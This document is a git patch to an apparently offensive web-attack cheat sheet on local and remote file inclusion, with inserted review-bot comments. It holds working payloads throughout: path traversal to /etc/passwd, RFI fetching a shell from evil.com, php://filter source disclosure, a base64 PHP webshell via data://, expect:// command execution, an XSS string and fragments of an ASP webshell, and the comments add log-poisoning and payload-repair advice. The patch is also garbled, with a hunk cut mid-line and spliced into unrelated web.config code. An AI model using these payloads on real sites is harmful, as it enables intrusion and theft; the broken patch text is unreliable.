From 76aefd9da2c306455f207394f355c65a04f5ed87 Mon Sep 17 00:00:00 2001
From: Swissky
Date: Sat, 7 Jul 2018 12:04:55 +0200
Subject: [PATCH] Path traversal refactor + AD cme module msf/empire + IIS
web.config
---
File Inclusion - Path Traversal/README.md | 136 +++++++++++-------
.../Active Directory Attack.md | 12 +-
SQL injection/README.md | 2 +
.../IIS Web Config/web.config | 34 +++++
4 files changed, 129 insertions(+), 55 deletions(-)
create mode 100644 Upload insecure files/IIS Web Config/web.config
diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md
index e0de154..087458e 100644
--- a/File Inclusion - Path Traversal/README.md
+++ b/File Inclusion - Path Traversal/README.md
@@ -1,6 +1,23 @@
# Local/Remote File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
+## Summary
+* [Basic LFI](#basic-lfi)
+* [Basic RFI](#basic-rfi)
+* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
+ * [Wrapper php://filter]()
+ * [Wrapper zip://]()
+ * [Wrapper data://]()
+ * [Wrapper expect://]()
+ * [Wrapper input://]()
+* [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
+* [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
+* [LFI to RCE via upload](#lfi-to-rce-via-upload)
+* [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
+* [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
+* [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
+
+
Interesting files to check out :
```
/etc/issue
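Review bot: the five wrapper sub-entries in the new Summary have empty link targets (`* [Wrapper php://filter]()` through `* [Wrapper input://]()`), so they render as dead links while every sibling entry carries a `#slug` anchor; give each one the GitHub slug of its heading, e.g. `* [Wrapper php://filter](#wrapper-phpfilter)` and `* [Wrapper zip://](#wrapper-zip)`, and confirm that a `### Wrapper input://` heading actually exists further down, because no such section appears anywhere in this patch. The other anchors check out: `#lfi--rfi-using-wrappers` is the correct slug for "LFI / RFI using wrappers" (the slash collapses to nothing, leaving the double hyphen) and `#lfi-to-rce-via-procfd` is right for the `/proc/*/fd` heading. Minor: the added block ends with two blank lines before "Interesting files to check out :", one is enough, and since the intro is being touched, the unchanged context line should read "a "dynamic file inclusion" mechanism" (singular) rather than "mechanisms".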
@@ -20,6 +37,9 @@ Interesting files to check out :
/proc/net/route
/proc/net/tcp
/proc/net/udp
+```
+The following log files are controllable and can be included with an evil payload to achieve a command execution
+```
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
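Review bot: the new sentence "The following log files are controllable and can be included with an evil payload to achieve a command execution" has no full stop and does not say how the log becomes controllable, which is the whole point of the list: the attacker gets PHP code written into the log through a request field the server records (the User-Agent header or the request path for the Apache access log, a bogus username for the auth log, a mail subject for /var/log/mail) and then includes the log so that the code executes. Suggest: "The following log files can be poisoned: inject PHP code through a request field that gets logged (e.g. the User-Agent header), then include the log file to execute it." and point to the "LFI to RCE via controlled log file" section that the new Summary already announces, so the list and the technique are not explained in two separate places.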
@@ -30,47 +50,68 @@ Interesting files to check out :
/var/log/mail
```
+
## Basic LFI
```
http://example.com/index.php?page=../../../etc/passwd
+```
Null byte
+```
http://example.com/index.php?page=../../../etc/passwd%00
+```
Double encoding
+```
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
+```
Path truncation
+```
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
+```
-Filter bypass
+Filter bypass tricks
+```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
+http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```
-## Basic RFI (null byte, double encoding and other tricks)
+## Basic RFI
```
http://example.com/index.php?page=http://evil.com/shell.txt
+```
+
+Null byte
+```
http://example.com/index.php?page=http://evil.com/shell.txt%00
+```
+
+Double encoding
+```
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```
-## LFI / RFI Wrappers
+## LFI / RFI using wrappers
-LFI Wrapper rot13 and base64 - php://filter case insensitive
+### Wrapper php://filter
+The part "php://filter" is case insensitive
```
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
+```
-can be chained with a compression wrapper
+can be chained with a compression wrapper for large files.
+```
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
```
-LFI Wrapper ZIP
+### Wrapper zip://
```python
echo "" > payload.php;
zip payload.zip payload.php;
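Review bot: the fence opened for the zip:// wrapper is tagged ```python but the block holds shell commands (`echo "" > payload.php;`, `zip payload.zip payload.php;`), so the highlighting is wrong; tag it ```bash. As the first line appears here the echo writes an empty payload.php, so make sure the PHP webshell body is really present in that line, otherwise the included file executes nothing. Two caveats deserve a line each: the null-byte truncation in `http://example.com/index.php?page=../../../etc/passwd%00` only works on PHP older than 5.3.4, where include() stopped accepting an embedded NUL, and the "Path truncation" payloads likewise depend on old PHP behaviour, so stating the versions they apply to will save readers time on current targets. The chained filter `php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd` needs a decoding hint: base64-decode the response, then inflate it with `gzinflate()` in PHP or `zlib.decompress(data, -15)` in Python, because zlib.deflate emits a raw DEFLATE stream without the zlib header. Style: "can be chained with a compression wrapper for large files." starts lowercase and zlib.deflate is a stream filter, not a wrapper; the preceding "The part "php://filter" is case insensitive" is missing its full stop.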
@@ -81,50 +122,55 @@ http://example.com/index.php?page=zip://shell.jpg%23payload.php
```
-RFI Wrapper DATA with "" payload
+### Wrapper data://
```
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
+NOTE: the payload is ""
```
+Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
-RFI Wrapper EXPECT
+
+### Wrapper expect://
```
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
```
-Bonus XSS
-XSS via RFI/LFI with "
+")
+Set wShell1 = CreateObject("WScript.Shell")
+Set cmd1 = wShell1.Exec("whoami")
+output1 = cmd1.StdOut.Readall()
+set cmd1 = nothing: Set wShell1 = nothing
+Response.write(output1)
+Response.write("
+
+–>
+
+
\ No newline at end of file
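Review bot: the two expect examples use a scheme that does not exist, `http://example.com/index.php?page=php:expect://id`; the wrapper is registered as `expect://`, so the payloads should be `?page=expect://id` and `?page=expect://ls`. Both expect:// and the data:// example are conditional and the text should say so: expect:// needs the PECL expect extension loaded, and including `data://text/plain;base64,...` requires `allow_url_include=On`, the same setting the "Basic RFI" section depends on, otherwise readers will try them on a default install and wrongly conclude the target is safe. The "NOTE: the payload is """ line has lost its content; the base64 string above it decodes to `<?php system($_GET['cmd']);echo 'Shell done !'; ?>`, which is what the note should spell out (inside backticks so the angle brackets survive Markdown), and the "Fun fact" string decodes to `<svg onload=alert(1)>`, so name it as an XSS via a `data:` URI and call the product by its name, the Chrome XSS Auditor. Finally, the patch is not applicable as posted: the diffstat announces four files but only one `diff --git` header is present, and the README hunk is cut off after `-XSS via RFI/LFI with "` and runs straight into classic ASP lines (`Set wShell1 = CreateObject("WScript.Shell")`, `Set cmd1 = wShell1.Exec("whoami")`) that belong in the new `Upload insecure files/IIS Web Config/web.config`, with markup evidently stripped given fragments like `+")` and `+Response.write("`; please regenerate with `git format-patch` and resend so the Active Directory, SQL injection and web.config changes can be reviewed.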